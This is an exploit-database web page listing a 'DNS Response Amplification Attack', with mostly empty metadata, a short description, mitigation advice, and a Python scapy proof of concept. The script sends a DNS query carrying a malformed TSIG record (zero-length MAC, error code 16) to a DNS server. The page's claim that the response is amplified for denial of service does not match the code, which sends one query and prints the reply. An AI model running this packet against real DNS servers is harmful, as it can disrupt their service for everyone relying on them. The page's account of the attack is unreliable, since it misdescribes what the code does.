header-logo
Suggest Exploit
vendor:
N/A
by:
N/A
7.5
CVSS
HIGH
DNS Response Amplification Attack
400
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
2020

DNS Response Amplification Attack

This exploit is a DNS Response Amplification Attack which uses the scapy library to send a DNS request to a local DNS server. The request contains a DNS Resource Record (RR) of type TSIG which is used to authenticate the request. The response from the server is amplified and can be used to launch a denial of service attack.

Mitigation:

The best way to mitigate this attack is to limit the size of the DNS response. This can be done by configuring the DNS server to limit the size of the response. Additionally, the DNS server should be configured to only respond to requests from trusted sources.
Source

Exploit-DB raw data:

#!/usr/bin/python
#coding:utf-8

from scapy.all import DNS, DNSQR, IP, sr1, UDP, DNSRRTSIG, DNSRROPT

tsig = DNSRRTSIG(rrname="local-ddns", algo_name="hmac-sha256", rclass=255, mac_len=0, mac_data="", time_signed=0, fudge=300, error=16)

dns_req = IP(dst='127.0.0.1')/UDP(dport=53)/DNS(rd=1, ad=1, qd=DNSQR(qname='www.example.com'), ar=tsig)
answer = sr1(dns_req, verbose=0)

print(answer[DNS].summary())

Navigation

Suggest Exploit

Services By CQR